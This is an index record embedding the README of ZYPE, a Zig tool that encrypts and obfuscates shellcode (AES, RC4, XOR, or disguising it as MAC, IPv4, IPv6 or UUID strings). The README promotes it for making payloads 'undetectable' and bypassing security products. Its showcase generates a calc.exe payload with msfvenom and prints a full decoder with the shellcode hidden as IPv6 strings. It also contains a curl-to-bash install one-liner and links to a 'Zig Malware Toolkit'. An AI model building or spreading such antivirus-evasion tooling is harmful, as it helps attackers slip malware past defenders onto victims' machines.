{"id":28728834,"url":"https://github.com/cx330blake/zype","last_synced_at":"2026-05-14T20:07:09.917Z","repository":{"id":297689518,"uuid":"997380871","full_name":"CX330Blake/ZYPE","owner":"CX330Blake","description":"ZYPE: Your Payload Encryptor. MSFvenom shellcode got detected? ZYPE encrypt and obfuscate the shellcode for you!","archived":false,"fork":false,"pushed_at":"2025-06-12T07:33:14.000Z","size":1692,"stargazers_count":9,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-09T13:03:36.237Z","etag":null,"topics":["cybersecurity","encryption","hacking","hacking-tools","malware","malware-analysis","malware-research","obfuscation","red-team","security","shellcode","zig"],"latest_commit_sha":null,"homepage":"","language":"Zig","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CX330Blake.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-06T12:35:47.000Z","updated_at":"2025-10-03T21:32:38.000Z","dependencies_parsed_at":null,"dependency_job_id":"bb2855d2-ddfd-4774-bb51-15d93ae95694","html_url":"https://github.com/CX330Blake/ZYPE","commit_stats":null,"previous_names":["cx330blake/zype"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/CX330Blake/ZYPE","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CX330Blake%2FZYPE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CX330Blake%2FZYPE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CX330Blake%2FZYPE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CX330Blake%2FZYPE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CX330Blake","download_url":"https://codeload.github.com/CX330Blake/ZYPE/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CX330Blake%2FZYPE/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33041266,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-13T13:14:54.681Z","status":"online","status_checked_at":"2026-05-14T02:00:06.663Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","encryption","hacking","hacking-tools","malware","malware-analysis","malware-research","obfuscation","red-team","security","shellcode","zig"],"created_at":"2025-06-15T15:38:47.350Z","updated_at":"2026-05-14T20:07:09.898Z","avatar_url":"https://github.com/CX330Blake.png","language":"Zig","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ZYPE: Your Payload Encryptor\n\n\u003cp align=\"center\"\u003e\n  \u003cimg alt=\"GitHub License\" src=\"https://img.shields.io/github/license/CX330Blake/zype\"\u003e\n  \u003cimg alt=\"GitHub top language\" src=\"https://img.shields.io/github/languages/top/cx330blake/zype\"\u003e\n  \u003cimg alt=\"GitHub Downloads (all assets, all releases)\" src=\"https://img.shields.io/github/downloads/cx330blake/zype/total\"\u003e\n  \u003cimg alt=\"GitHub repo size\" src=\"https://img.shields.io/github/repo-size/cx330blake/zype\"\u003e\n  \u003cimg alt=\"X (formerly Twitter) Follow\" src=\"https://img.shields.io/twitter/follow/CX330Blake\"\u003e\n\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"#whats-zype\"\u003eWhat's ZYPE?\u003c/a\u003e •\n  \u003ca href=\"#showcase\"\u003eShowcase\u003c/a\u003e •\n  \u003ca href=\"#installation\"\u003eInstallation\u003c/a\u003e •\n  \u003ca href=\"#usage\"\u003eUsage\u003c/a\u003e •\n  \u003ca href=\"#test\"\u003eTest\u003c/a\u003e •\n  \u003ca href=\"#contribution\"\u003eContribution\u003c/a\u003e •\n  \u003ca href=\"#zig-malware-toolkit\"\u003eZig Malware Toolkit\u003c/a\u003e •\n  \u003ca href=\"#star-history\"\u003eStar History\u003c/a\u003e\n\u003c/p\u003e\n\n\u003cp height=\"300\" align=\"center\"\u003e\n  \u003cimg src=\"./assets/ZYPE.png\"\u003e\n\u003c/p\u003e\n\n## What's ZYPE?\n\nZYPE: Zig Your Payload Encryptor - Transform your shellcode into undetectable, obfuscated payloads that bypass modern security solutions.\n\n- ⚡ Lightning Fast: Written in Zig for optimal performance and memory safety\n- 🎯 Multi-Method Obfuscation: Support for AES, RC4, XOR encryption plus MAC/IPv4/IPv6/UUID address obfuscation\n- 🌐 Cross-Platform Compatible: Generated decoder templates work on Windows, Linux, and macOS without API dependencies\n- 🛠️ Developer Friendly: Interactive mode for easy setup, plus command-line interface for automation\n- 🔒 Advanced Evasion: Multiple encoding layers make static analysis nearly impossible\n- 📦 Complete Solution: Generates both obfuscated payload data and ready-to-compile decoder templates\n- 🚀 Zero Dependencies: Self-contained tool with no external requirements\n\n## Showcase\n\nIn the following example, I will use MSFvenom to generate a Windows shellcode to execute calc.exe and use ZYPE to do the IPv6 obfuscation. Let's first generate the shellcode.\n\n```bash\nmsfvenom -p windows/exec CMD=calc.exe -f raw -o shellcode.bin\n```\n\nAfter that, we use ZYPE to help use do the obfuscation.\n\n```bash\nzype -f shellcode.bin -m ipv6 \u003e shellcode.zig\n```\n\nThis will generate the encrypted/obfuscated shellcode and the function to decrypt/deobfuscate it in a Zig file. This is the output.\n\n```zig\nconst std = @import(\"std\");\nconst net = std.net;\n\nconst IPV6_ARRAY: [13][]const u8 = [_][]const u8{\n    \"fce8:8200:0000:6089:e531:c064:8b50:308b\",\n    \"520c:8b52:148b:7228:0fb7:4a26:31ff:ac3c\",\n    \"617c:022c:20c1:cf0d:01c7:e2f2:5257:8b52\",\n    \"108b:4a3c:8b4c:1178:e348:01d1:518b:5920\",\n    \"01d3:8b49:18e3:3a49:8b34:8b01:d631:ffac\",\n    \"c1cf:0d01:c738:e075:f603:7df8:3b7d:2475\",\n    \"e458:8b58:2401:d366:8b0c:4b8b:581c:01d3\",\n    \"8b04:8b01:d089:4424:245b:5b61:595a:51ff\",\n    \"e05f:5f5a:8b12:eb8d:5d6a:018d:85b2:0000\",\n    \"0050:6831:8b6f:87ff:d5bb:f0b5:a256:68a6\",\n    \"95bd:9dff:d53c:067c:0a80:fbe0:7505:bb47\",\n    \"1372:6f6a:0053:ffd5:6361:6c63:2e65:7865\",\n    \"0000:0000:0000:0000:0000:0000:0000:0000\"\n};\nconst NUMBER_OF_ELEMENTS: usize = 13;\n\nfn ipv6Deobfuscation(ipv6_array: []const []const u8, allocator: std.mem.Allocator) ![]u8 {\n    var buffer = try allocator.alloc(u8, ipv6_array.len * 16);\n    var offset: usize = 0;\n\n    for (ipv6_array) |ip| {\n        const addr = net.Address.parseIp6(ip, 0) catch return error.InvalidIpFormat;\n        const ip_bytes = @as([16]u8, @bitCast(addr.in6.sa.addr));\n        @memcpy(buffer[offset..offset + 16], \u0026ip_bytes);\n        offset += 16;\n    }\n\n    return buffer;\n}\n\npub fn main() !void {\n    var gpa = std.heap.GeneralPurposeAllocator(.{}){};\n    defer _ = gpa.deinit();\n    const allocator = gpa.allocator();\n\n    const shellcode = try ipv6Deobfuscation(\u0026IPV6_ARRAY, allocator);\n    defer allocator.free(shellcode);\n    std.debug.print(\"Decrypted shellcode length: {}\\n\", .{shellcode.len});\n    std.debug.print(\"Decrypted shellcode: {any}\\n\", .{shellcode});\n}\n```\n\n## Installation\n\nZYPE is now currently support Linux only, but the Windows version will be released soon.\n\nYou can simply copy and paste the following one-liner to install ZYPE.\n\n```bash\nbash \u003c(curl -sSL https://raw.githubusercontent.com/CX330Blake/zype/main/install.sh)\n```\n\n\u003e [!WARNING]  \n\u003e Never execute any untrusted script on your machine. Read the script first.\n\nOn the other hand, you can clone this repo and use the following command to build your own ZYRA biary.\n\n```bash\ngit clone https://github.com/CX330Blake/ZYPE\ncd ZYPE\n# You can change the build flag on your own\nzig build --release=fast\n```\n\n## Usage\n\n```\n ___  _   _ ___  ____\n   /   \\_/  |__] |___\n  /__   |   |    |___\n\nZYPE shellcode encryptor v0.1.0\nCopyright (C) 2025 @CX330Blake.\nAll rights reserved.\n\nZYPE v0.1.0 - Shellcode encryptor and obfuscator\n\nUsage: zype [options]\n\nOptions:\n  -h, --help              Show this help message\n  -v, --version           Show version information\n  -i, --interactive       Interactive mode (guided setup)\n  -m, --method \u003ctype\u003e     Encryption/obfuscation method\n  -f, --file \u003cpath\u003e       Input shellcode file path\n\nSupported Methods:\n  mac                     MAC address obfuscation\n  ipv4                    IPv4 address obfuscation\n  ipv6                    IPv6 address obfuscation\n  uuid                    UUID obfuscation\n  aes                     AES encryption (CTR mode)\n  rc4                     RC4 encryption\n  xor                     XOR encryption\n\nExamples:\n  zype -i                                         # Interactive mode\n  zype -m aes -f shellcode.bin \u003e shellcode.zig    # AES encrypt shellcode.bin\n  zype -m mac -f shellcode.bin                    # MAC address obfuscation\n  zype --method rc4 --file sc.bin                 # RC4 encryption\n\nNotes:\n  - Interactive mode provides guided setup for all options\n  - Output includes both obfuscated data and decoder template\n  - Generated code is cross-platform compatible (no Windows APIs)\n```\n\n## Test\n\nYou can run the following command in the **example** directory to test the ZYPE is working normally.\n\n```bash\n./show.sh\n```\n\nYou should see no error and the shellcode is decrypted/deobfuscated.\n\n## Contribution\n\nThis project is maintained by [@CX330Blake](https://github.com/CX330Blake/). PRs are welcome if you also want to contribute to this project.\n\n## Zig Malware Toolkit\n\nIf you want to learn more about Zig for malware, here's some tools for malware development.\n\n- [ZYPE](https://github.com/cx330blake/zype)\n- [ZYRA](https://github.com/cx330blake/zyra)\n\n## Star history\n\n[![Star History Chart](https://api.star-history.com/svg?repos=CX330Blake/ZYPE\u0026type=Date)](https://www.star-history.com/#CX330Blake/ZYPE\u0026Date)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcx330blake%2Fzype","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcx330blake%2Fzype","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcx330blake%2Fzype/lists"}